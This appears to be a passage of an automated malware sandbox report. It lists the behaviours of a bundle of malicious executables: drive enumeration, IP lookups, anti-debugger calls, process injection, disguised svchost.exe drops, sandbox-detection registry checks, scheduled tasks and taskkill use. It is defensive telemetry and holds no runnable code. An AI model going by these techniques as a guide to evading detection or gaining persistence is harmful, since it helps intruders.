Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\G: | installer.exe
File opened (read-only) | \??\H: | installer.exe
File opened (read-only) | \??\J: | installer.exe
File opened (read-only) | \??\T: | installer.exe
File opened (read-only) | \??\U: | installer.exe
File opened (read-only) | \??\V: | installer.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\L: | installer.exe
File opened (read-only) | \??\N: | installer.exe
File opened (read-only) | \??\P: | installer.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\X: | installer.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\M: | installer.exe
File opened (read-only) | \??\O: | installer.exe
File opened (read-only) | \??\Q: | installer.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\E: | installer.exe
File opened (read-only) | \??\R: | installer.exe
File opened (read-only) | \??\Z: | installer.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\W: | installer.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\F: | installer.exe
File opened (read-only) | \??\K: | installer.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\B: | installer.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\Y: | installer.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\A: | installer.exe
File opened (read-only) | \??\I: | installer.exe
File opened (read-only) | \??\S: | installer.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (10 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
54 | ipinfo.io
292 | ipinfo.io
323 | ipinfo.io
2 | ip-api.com
53 | ipinfo.io
240 | ipinfo.io
304 | ipinfo.io
391 | ipinfo.io
2 | ipinfo.io
239 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in System32 directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\ntkrnlmp.pdb | WerFault.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (9 IoCs)
pid | Process
5228 | 227470.exe
5628 | Conhost.exe
5156 | CccUqSnvorEDEpUpxK4J3YF5.exe
5968 | Conhost.exe
6740 | Conhost.exe
6996 | RfdHYMkUrnVfH1ZtERmjgC7e.exe
2012 | Conhost.exe
3824 | Q_fET_usQo2X_6EmGsXsx62w.exe
7848 | 8588289.exe

Suspicious use of SetThreadContext (16 IoCs)
description | pid | Process | procid_target
PID 3436 set thread context of 5504 | 3436 | Wed128c2773227671b3f.exe | 132
PID 4616 set thread context of 5512 | 4616 | Wed121f7e9e92793cf.exe | 130
PID 2996 set thread context of 5532 | 2996 | Wed12859e3c1cf63b6a0.exe | 131
PID 6004 set thread context of 5592 | 6004 | JoVBqle5ZuYZOmKRj95tPfGf.exe | 172
PID 5348 set thread context of 6456 | 5348 | Conhost.exe | 195
PID 5420 set thread context of 3196 | 5420 | ArGiap3960SUZs1dAEDT_gNj.exe | 32
PID 1288 set thread context of 3196 | 1288 | 7elpvTmw1vT1ONC9ndp6H4va.exe | 32
PID 6892 set thread context of 1416 | 6892 | MegogoSell_crypted.exe | 269
PID 4468 set thread context of 7540 | 4468 | 8355.exe | 331
PID 5956 set thread context of 7472 | 5956 | hgFUPQSfVWja4bF9va2Nco94.exe | 353
PID 6512 set thread context of 3196 | 6512 | systray.exe | 32
PID 1088 set thread context of 552 | 1088 | hgFUPQSfVWja4bF9va2Nco94.exe | 398
PID 2788 set thread context of 7368 | 2788 | hepatocyte.exe | 435
PID 8676 set thread context of 7488 | 8676 | 1CE5.exe | 470
PID 2220 set thread context of 6908 | 2220 | 877E.exe | 605
PID 7180 set thread context of 5364 | 7180 | scriptwriters.exe | 671
Drops file in Program Files directory 21 IoCs
description ioc Process
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe
File created C:\Program Files\Common Files\System\sememe\svchost.exe hgFUPQSfVWja4bF9va2Nco94.exe
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe
File created C:\Program Files (x86)\Windows Mail\Bududosopo.exe.config DYbALA.exe
File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini T95LOChSK2FJnZ8sP6x6_E2w.exe
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe
File created C:\Program Files (x86)\FarLabUninstaller\is-BERPI.tmp setup.tmp
File created C:\Program Files (x86)\FarLabUninstaller\is-N703M.tmp setup.tmp
File created C:\Program Files (x86)\FarLabUninstaller\is-3MEEL.tmp setup.tmp
File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe T95LOChSK2FJnZ8sP6x6_E2w.exe
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp
File created C:\Program Files (x86)\FarLabUninstaller\is-75206.tmp setup.tmp
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp
File created C:\Program Files (x86)\Windows Mail\Bududosopo.exe DYbALA.exe
File created C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe.config DYbALA.exe
File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe T95LOChSK2FJnZ8sP6x6_E2w.exe
File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp
File created C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe DYbALA.exe
File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe T95LOChSK2FJnZ8sP6x6_E2w.exe
File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe setup.tmp
Drops file in Windows directory 14 IoCs
description ioc Process
File opened for modification C:\Windows\WindowsUpdate.log svchost.exe
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe
File created C:\Windows\Cursors\veejays\svchost.exe 877E.exe
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\LiveKernelReports\WATCHDOG\WATCHDOG-20211108-0823.dmp WerFault.exe
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe
File created C:\Windows\System\xxx1.bak Conhost.exe
File created C:\Windows\System\svchost.exe Conhost.exe
File opened for modification C:\Windows\System\svchost.exe Conhost.exe
File created C:\Windows\SystemTemp\WER-259937906-0.sysdata.xml WerFault.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 39 IoCs
pid pid_target Process procid_target
1912 2116 WerFault.exe 83
2608 3764 WerFault.exe 111
5348 1116 WerFault.exe 123
988 3228 WerFault.exe 142
4640 408 WerFault.exe 151
6288 2960 WerFault.exe 149
6884 5824 WerFault.exe 160
7156 5932 WerFault.exe 154
6240 5816 WerFault.exe 220
5824 5984 WerFault.exe 238
3044 2432 WerFault.exe 216
6328 1596 WerFault.exe 239
1584 6820 WerFault.exe 240
1052 6608 WerFault.exe 228
7892 2200 WerFault.exe 257
4540 6176 WerFault.exe 305
1052 5984 WerFault.exe 310
4584 5952 WerFault.exe 378
9004 7384 WerFault.exe 326
8636 7496 WerFault.exe 328
4732 1064 WerFault.exe 355
8696 1064 WerFault.exe 355
5316 8924 WerFault.exe 410
6492 5608 WerFault.exe 421
9028 9128 WerFault.exe 418
5396 3404 WerFault.exe 436
5352 8036 WerFault.exe 455
4036 6420 WerFault.exe 454
7380 400 WerFault.exe 498
3032 2440 WerFault.exe 502
5288 2312 WerFault.exe 508
6400 9072 WerFault.exe 515
3016 8884 WerFault.exe 523
5112 8884 WerFault.exe 523
7332 8516 WerFault.exe 604
6260 8516 WerFault.exe 604
8940 8540 WerFault.exe 628
6476 2156 WerFault.exe 656
5416 6460 WerFault.exe 642
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier powershell.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conhost.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Conhost.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 5qlTraWDq1vzRdVRwFZUNz29.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 powershell.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
7724 schtasks.exe
7044 schtasks.exe
7716 schtasks.exe
5932 schtasks.exe
2372 schtasks.exe
2156 schtasks.exe
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Conhost.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 5qlTraWDq1vzRdVRwFZUNz29.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 5qlTraWDq1vzRdVRwFZUNz29.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Underdress.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Conhost.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process
5392 ipconfig.exe
Kills process with taskkill 7 IoCs
pid Process
6624 taskkill.exe
4560 taskkill.exe
5152 taskkill.exe
7008 taskkill.exe
6076 taskkill.exe
7636 taskkill.exe
4228 taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WerFault.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\ValidDeviceId svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02grcmqafcyquvns\DeviceId = "<Data LastUpdatedTime=\"1636388669\"><User username=\"02GRCMQAFCYQUVNS\"><HardwareInfo BoundTime=\"1636388678\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WerFault.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\"" svchost.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Flags = "8256" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02grcmqafcyquvns\DeviceId = "<Data LastUpdatedTime=\"1636388669\"><User username=\"02GRCMQAFCYQUVNS\"><HardwareInfo BoundTime=\"1636388669\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe
